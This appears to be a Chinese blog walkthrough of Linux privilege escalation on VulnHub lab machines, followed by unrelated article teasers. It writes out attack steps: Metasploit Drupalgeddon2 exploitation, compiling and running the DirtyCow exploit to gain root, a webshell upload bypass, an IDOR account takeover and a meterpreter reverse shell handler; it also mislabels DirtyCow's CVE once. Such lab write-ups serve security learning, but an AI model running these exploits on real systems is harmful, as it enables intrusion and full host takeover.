linux內核漏洞檢測利用exp提權

案例一dirtycow(CVE-2016-5159)

有個前置知識就是? 獲取liunx的內核

hostnamectl

uname -a

然后這個內核漏洞進行提權的步驟也是和手工win進行提權差不多? ?也是需要使用輔助工具在本地進行輔助檢測? 然后去nomi-sec/PoC-in-GitHub: 📡 從 GitHub 自動收集 PoC。?? 小心惡意軟件。

去找尋exp或者使用? ?msf本地的? 梭哈模塊去尋找利用的漏洞

run post/multi/recon/local_exploit_suggester

輔助檢測工具:

單一的內核漏洞檢測:https://github.com/The-Z-Labs/linux-exploit-suggester

綜合型的工具:

https://github.com/diego-treitos/linux-smart-enumeration
我們把.sh文件上傳到/usr/share 下
然后我們掃描一下我們的靶機
https://www.vulnhub.com/entry/lampiao-1,249/
靶機下載地址
信息收集掃描ip掃描
訪問80端口發現沒有信息訪問1898
看到這個外星人圖標就知道是內網滲透中經常出現的Drupal
這個最常見的利用就是框架漏洞
發現是低版本的php搭建的 所以直接進行利用
這里我直接使用第二個exp
使用use進行調用
查看利用的配置??
檢查一下payload
設置上? rhost和rport
?
報這個標頭就是進入了 后滲透模式? 就是我們已經控制了對方的主機
查看用戶權限
找好定位我們現在是在web權限上
輸入shell獲取對方的命令行
查看id是1000內的所以我們的目標是拿取root權限
需要使用漏洞 先上傳檢測文件
報了小臟牛漏洞? 直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ?? Be careful Malware.
利用的exp
exp上傳 ?
上傳之后把exp.c進行編譯
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")'
復現環境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、內核提權:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二? pwnkit??

靶機下載https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先掃描內網的ip

開放了80?

這個漏洞是前端的一個邏輯越權漏洞 先注冊一個賬號

賬號修改里出現這個id可能就是 代表的賬戶?

我們試一下改為1會不會直接修改admin的賬號和密碼

哥斯拉生成后門?使用繞過形式 改為 .phtml 進行繞過

后門上傳成功

后門地點

http://192.168.248.136/upload/xxx.phtml

學個新操做? ?哥斯拉聯動msf(在不使用msfvemon生成反彈shell的情況下)

命令:

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加載再go

接受到了shell? ?然后進行提權

上傳檢測腳本

這個就是我們要學的新漏洞

第一個方法就是使用本地漏掃工具

run post/multi/recon/local_exploit_suggester
二就是? 使用search 搜索cve編號看看exp庫中有沒有利用的
提權成功

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/899859.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/899859.shtml
英文地址,請注明出處:http://en.pswp.cn/news/899859.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

重磅 | CertiK《Hack3d:2025第一季度安全報告》(附報告全文鏈接)

CertiK《Hack3d:2025年第一季度安全報告》現已發布,本次報告深入分析了2025年1至3月Web3.0領域的安全狀況。2025年第一季度共發生197起安全事件,總損失約為16.7億美元,環比激增303.4%。其中Bybit事件導致約14.5億美元的損失&#…

經典卷積神經網絡LeNet實現(pytorch版)

LeNet卷積神經網絡 一、理論部分1.1 核心理論1.2 LeNet-5 網絡結構1.3 關鍵細節1.4 后期改進1.6 意義與局限性二、代碼實現2.1 導包2.1 數據加載和處理2.3 網絡構建2.4 訓練和測試函數2.4.1 訓練函數2.4.2 測試函數2.5 訓練和保存模型2.6 模型加載和預測一、理論部分 LeNet是一…

二維碼掃不出?用QR Research工具

一.簡介 簡單來說QR Research就是用來掃二維碼的工具 當二維碼模糊不清,無法用普通方式掃時,就可以用QR Research輕松掃描。QR Research還可以分析變形/破損二維碼(修復或提取有效部分) 二.下載安裝 QR Research 三.例題 這…

02_使用Docker在服務器上部署Jekins實現項目的自動化部署

02_使用Docker在服務器上部署jenkins實現項目的自動化部署 一、使用docker拉取阿里云容器私有鏡像倉庫內的jenkins鏡像 登錄阿里云Docker Registry $ sudo docker login --usernamewxxxo1xxx registry.cn-shanghai.aliyuncs.com用于登錄的用戶名為阿里云賬號全名&#xff0c…

微服務組件——Eureka組件的安裝與使用指南

文章目錄 一、Eureka Server的安裝與配置1、創建Spring Boot項目2、添加依賴3、配置Eureka Server4、啟用Eureka Server5、啟動并訪問Dashboard 二、Eureka Client的配置(服務注冊)1、添加客戶端依賴2、配置客戶端3、啟用服務發現4、啟動服務 三、服務發…

探索Doris:日志分析的新寵,是否能取代老牌ES?

在大數據時代,日志存儲與分析對于企業的運營和決策起著至關重要的作用。Elasticsearch(簡稱 ES)作為一款廣泛應用的開源分布式搜索和分析引擎,長期以來在日志管理領域占據著舉足輕重的地位。然而,隨著技術的不斷發展&a…

學習threejs,使用Texture紋理貼圖,測試repeat重復紋理貼圖

👨??? 主頁: gis分享者 👨??? 感謝各位大佬 點贊👍 收藏? 留言📝 加關注?! 👨??? 收錄于專欄:threejs gis工程師 文章目錄 一、🍀前言1.1 ??Texture 紋理貼圖1.1.1 ??…

圖像配準及識別

一、圖像配準基礎 圖像配準,聽起來很高大上,其實用大白話來說,就是“讓兩張照片對齊”的技術。想象一下,你有兩張拍得不完全一樣的照片,比如一張是你從正面拍的風景,另一張是從側面拍的同一個地方&#xff…

QT之QML(簡單示例)

需求一:點擊按鈕彈出菜單,并且自定義菜單彈出位置。 mouse.x 和 mouse.y 獲取的是相對于 MouseArea(在這個例子中是 Button)左上角的局部坐標。如果你想要在鼠標點擊位置顯示 Menu,你需要將這個局部坐標轉換為相對于應…

如何編寫單元測試

一、前言知識 1.開發過程 需求分析->設計->開發->測試->上線 2.測試種類 單元測試(測試模塊編碼)、黑盒測試(測試功能是否滿足需求)、白盒測試(測試程序內部的邏輯結構)、回歸測試(提出的缺陷進行二次驗證)、集成測試(測試主要的業務功能及模塊間的整合性)、系…

LeetCode 解題思路 30(Hot 100)

解題思路: 遞歸參數: 生成括號的對數 n、結果集 result、當前路徑 path、左括號數 open、右括號數 close。遞歸過程: 當當前路徑 path 的長度等于 n * 2 時,說明已經生成有效括號,加入結果集。若左括號數小于 n&…

【Golang】Windows系統鍵鼠空閑監測練習

在本文中,我們將練習如何使用Golang編寫一個簡單的Windows系統空閑時間監測工具。該工具能夠檢測系統的空閑時間,并在達到一定閾值時計數。 功能概述 監控鼠標和鍵盤的空閑事件,每空閑超過50s,觸發次數加一。 該工具具有以下功…

關于React Redux

官網:👉詳情一 👉詳情二 👉關于redux 使用原因:👉詳情 /** 2-1、隨著javascript單頁應用程序的發展,需要在代碼中管理更多的狀態(包括服務器響應數據、緩存數據、本地創建還未發送…

MySQL和Oracle批量插入SQL差異詳解

文章目錄 MySQL和Oracle批量插入SQL差異詳解1. 基本批量插入語法1.1 MySQL批量插入1.2 Oracle批量插入 2. 帶序列的批量插入2.1 MySQL帶自增ID的批量插入2.2 Oracle帶序列的批量插入 3. 條件批量插入3.1 MySQL條件批量插入3.2 Oracle條件批量插入 MySQL和Oracle批量插入SQL差異…

43頁可編輯PPT | 大數據管理中心設計規劃方案大數據中心組織架構大數據組織管理

這份文檔是一份關于大數據管理中心規劃設計方案的詳細報告,涵蓋了背景與需求分析、整體規劃方案、關鍵能力實現方案以及實施方案等內容。報告強調大數據在城市治理中的重要性,提出通過構建統一的大數據平臺,整合城市各部門數據資源&#xff0…

Python-八股總結

目錄 1 python 垃圾處理機制2 yield3 python 多繼承,兩個父類有同名方法怎么辦?4 python 多線程/多進程/協程4.1 多線程與GIL全局解釋器鎖4.2 多進程4.3 協程 5 樂觀鎖/悲觀鎖6 基本數據結構**1. 列表(List)****2. 元組&#xff0…

HTML 標簽類型全面介紹

HTML 標簽類型全面介紹 HTML(HyperText Markup Language)是構建 Web 頁面結構的基礎語言。HTML 由不同類型的標簽組成,每種標簽都有特定的用途。本文將全面介紹 HTML 標簽的分類及其用法。 1. HTML 標簽概述 HTML 標簽通常成對出現&#xf…

vscode中的【粘滯滾動】的基本概念和作用,關閉了以后如何開啟

1、粘滯滾動的基本概念和作用 ?VSCode中的“粘滯”功能主要是指編輯器在滾動時的一種特殊效果,使得編輯器在滾動到某個位置時會“粘”在那里,而不是平滑滾動到底部或頂部。? 粘滯滾動的基本概念和作用 粘滯滾動功能可以讓用戶在滾動時更直觀地看到當前…

【商城實戰(101)】電商未來已來:新技術引領商城發展新航向

【商城實戰】專欄重磅來襲!這是一份專為開發者與電商從業者打造的超詳細指南。從項目基礎搭建,運用 uniapp、Element Plus、SpringBoot 搭建商城框架,到用戶、商品、訂單等核心模塊開發,再到性能優化、安全加固、多端適配,乃至運營推廣策略,102 章內容層層遞進。無論是想…

深度學習Note.5(機器學習.6)

1.Runner類 一個任務應用機器學習方法流程: 數據集構建 模型構建 損失函數定義 優化器 模型訓練 模型評價 模型預測 所以根據以上,我們把機器學習模型基本要素封裝成一個Runner類(加上模型保存、模型加載等功能。) Runne…